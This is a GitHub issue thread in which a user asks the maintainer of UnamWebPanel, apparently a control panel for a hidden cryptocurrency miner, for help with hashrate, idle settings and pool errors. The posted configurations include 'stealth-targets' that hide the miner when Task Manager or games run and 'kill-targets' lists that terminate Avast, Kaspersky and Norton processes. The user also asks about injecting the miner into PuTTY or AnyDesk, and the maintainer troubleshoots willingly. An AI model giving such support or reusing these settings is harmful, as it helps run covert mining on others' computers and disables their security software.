### ISSUE TITLE
HASHRAT 0 AND SUDENLY GOING TO IDLE

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [UnamSanctam/UnamWebPanel#288]
MY WEB CONFIGRATION

{
	"algo": "rx/0",
	"pool": "xmr.2miners.com",
	"port": 12222,
	"wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC",
	"password": "x",
	"rig-id": "{COMPUTERNAME}",
	"nicehash": false,
	"ssltls": true,
	"max-cpu": 50,
	"idle-wait": 0,
	"idle-cpu": 80,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "",
	"stealth-fullscreen": false
}

**Comment by UnamSanctam** [comment]
Since you have `"idle-wait": 0` then it shouldn't go idle at all. Are you sure that you have the miner set to that configuration?

**Comment by DARK-DEVIL-66** [comment]
NO I SET IT 5

**Comment by DARK-DEVIL-66** [comment]
I WANT TO KNOW CAN I CHANGE POOL/PORT/MAX-CPU/IDLE-CPU IN WEB CONFIGRATION SECTION ?

**Comment by DARK-DEVIL-66** [comment]
PLEASE TELL ME A MAX CPU MINER CONFIGRATION PLZ ?

**Comment by UnamSanctam** [comment]
Yes you can change the values by using the configuration you sent. In the configuration you sent then you can change the "max-cpu" value and then save that in the web panel configuration.

**Comment by DARK-DEVIL-66** [comment]
MY 01 MACHIN IS OFFLINE BUT MY WEB PENAL SHWING IT'S ONLINE BUT HASHRAT 0

**Comment by DARK-DEVIL-66** [comment]
I CHANGED TO WEB PENAL CONFIG CPU TO GPU BUT NOT CHANGING POOL AND PORT?

**Comment by DARK-DEVIL-66** [comment]
{
	"algo": "rx/0",
	"pool": "xmr.2miners.com",
	"port": 12222,
	"wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC",
	"password": "x",
	"rig-id": "{COMPUTERNAME}",
	"nicehash": false,
	"ssltls": true,
	"max-cpu": 20,
	"idle-wait": 0,
	"idle-cpu": 80,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe",
	"stealth-fullscreen": false
}


TO 


{
    "url": "stratums://`0xd24cdf5736031b8ee75fb473f1ea674991dffbb9`.{COMPUTERNAME}@etc.2miners.com:11010",
    "algo": "etchash",
    "max-gpu": 50,
    "idle-wait": 0,
    "idle-gpu": 100,
	"ssltls": true,
	"password": "x",
	"nicehash": false,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,kavfswp.exe,kavtray.exe,kavfsmui.exe,kavshell.exe,kavfsrcn.exe,kavfs.exe,kavfsgt.exe,kavfswh.exe,kavfsscs.exe,ARestore.exe,asOELnch.exe,buVss.exe,cltLMH.exe,cltRT.exe,coInst.exe,coNatHst.exe,CpySnpt.exe,EFAInst64.exe,elaminst.exe,FLDgHost.exe,InstCA.exe,MCUI32.exe,Navw32.exe,ncolow.exe,NortonSecurity.exe,NSc.exe,nsWscSvc.exe,nuPerfScan.exe,RuleUp.exe,SEFInst.exe,Sevntx64.exe,SRTSP_CA.exe,SymDgnHC.exe,symerr.exe,SymVTCatalogDB.exe,tuIH.exe,uiStub.exe,uiWNSNotificationApp.exe,Upgrade.exe,vpnCA.exe,wa_3rd_party_host_32.exe,wa_3rd_party_host_64.exe,WFPUnins.exe,wpInstCA.exe,WSCStub.exe",
    "stealth-fullscreen": false
}

**Comment by UnamSanctam** [comment]
>MY 01 MACHIN IS OFFLINE BUT MY WEB PENAL SHWING IT'S ONLINE BUT HASHRAT 0

The web panel will show a miner as offline when they haven't contacted the web panel for 3 minutes.

>I CHANGED TO WEB PENAL CONFIG CPU TO GPU BUT NOT CHANGING POOL AND PORT?

You can't change a CPU miner to a GPU miner using the web panel configuration since they are two separate programs. You should add both a GPU miner and a CPU miner when creating your miner if you want both.

**Comment by DARK-DEVIL-66** [comment]
WHY MINERS ARE LONG TIME IN IDLE ?
IDEL WAIT- 5

**Comment by UnamSanctam** [comment]
The miners will exit idle whenever the mouse or keyboard is used on the computer. And the miner sends the information to the web panel every minute, so the miner information on the web panel will update once every minute.

**Comment by DARK-DEVIL-66** [comment]
OK BUT I CHANGED IDLE WAIT 5 TO IDEL WAIT 0 NOW HASHRAT ARE INCRESED & MINERS ARE ACTIVE BUT NOT GETTING PROFIT/ROUND SHARE % IN 2MINERS.COM DASHBOARD ?

**Comment by DARK-DEVIL-66** [comment]
{
	"algo": "rx/0",
	"pool": "xmr.2miners.com",
	"port": 12222,
	"wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC",
	"password": "x",
	"rig-id": "{COMPUTERNAME}",
	"nicehash": false,
	"ssltls": true,
	"max-cpu": 20,
	"idle-wait": 0,
	"idle-cpu": 80,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "",
	"stealth-fullscreen": false
}



IT'S RIGHT OR WRONG CONFIGRATION FOR HIGH PROFIT ?
RIG ID
MAX CPU
IDLE WAIT
IDLE CPU

**Comment by DARK-DEVIL-66** [comment]
{
	"algo": "rx/0",
	"pool": "xmr.2miners.com",
	"port": 12222,
	"wallet": "4B9ttGq1dRJgqmnGJ6HLeZ7VhdTxvQS67Nb4FiN5CXKNNy6mJnYvTSzdyXxrfUF1mcEx4VzqzA4mBRSDxCf6aCyL1D2hSnC",
	"password": "x",
	"rig-id": "{COMPUTERNAME}",
	"nicehash": false,
	"ssltls": true,
	"max-cpu": 50,
	"idle-wait": 0,
	"idle-cpu": 80,
	"stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
	"kill-targets": "",
	"stealth-fullscreen": false
}



IT'S OK OR NOT ?

**Comment by UnamSanctam** [comment]
Yes that looks okay.

**Comment by DARK-DEVIL-66** [comment]
WEB CONFIGRATION SECTION HAVE DEFULT XMRIG  I PASTED THE CONFIGRATION 

> Yes that looks okay.


NOW I HAVE 03 PC ACTIVE BUT NOW I NEED ADD NEW CONFIGRATION OR 01 ENOUGH?

**Comment by UnamSanctam** [comment]
Since you pasted it into "Default xmrig" then all xmrig (XMR) miners will use that configuration by default now.

**Comment by DARK-DEVIL-66** [comment]
WHY SOME MINERS ARE STATUS ERROR AND SAY CLOUD NOT CONNECT TO POOL ?

**Comment by UnamSanctam** [comment]
It means that they couldn't connect to the pool, are you sure that the configuration is set to what you sent before?

**Comment by DARK-DEVIL-66** [comment]
yes  active all miners are same exe but one is always say cloud not connect

**Comment by DARK-DEVIL-66** [comment]
other one is always hashrat are 0

**Comment by DARK-DEVIL-66** [comment]
if you can make it pre inject to some sofwears like putty/anydesk ?

**Comment by DARK-DEVIL-66** [comment]
why every worker name before auto adding C letter  
eample :

my one pc worker name is AARAMBHDES
but web penal are showing CAARAMBHDES why that happen ?

**Comment by UnamSanctam** [comment]
>yes active all miners are same exe but one is always say cloud not connect

If only one is saying "Error" then most likely that computers network, ISP or government is blocking the pool server-

>other one is always hashrat are 0

Could be that it doesn't have any free CPU cores or enough RAM to mine XMR.

>if you can make it pre inject to some sofwears like putty/anydesk ?

No since it's not guaranteed that a user will have that software. And if the software isn't there then the miner would of course not be able to inject into anything. There's also the issues with 32-bit/64-bit.

>why every worker name before auto adding C letter

The C stands for "Computer", it adds that in front because the computer name is not guaranteed to be alphanumeric, and since pools usually only allow alphanumeric characters then if none of the computer names is alphanumeric then the worker name would be an empty string (which could cause the pool connection to be rejected)-

**Comment by DARK-DEVIL-66** [comment]
ok bro i have cleard all doubts & thanks for your time

**Comment by DARK-DEVIL-66** [comment]
Well Support-5star
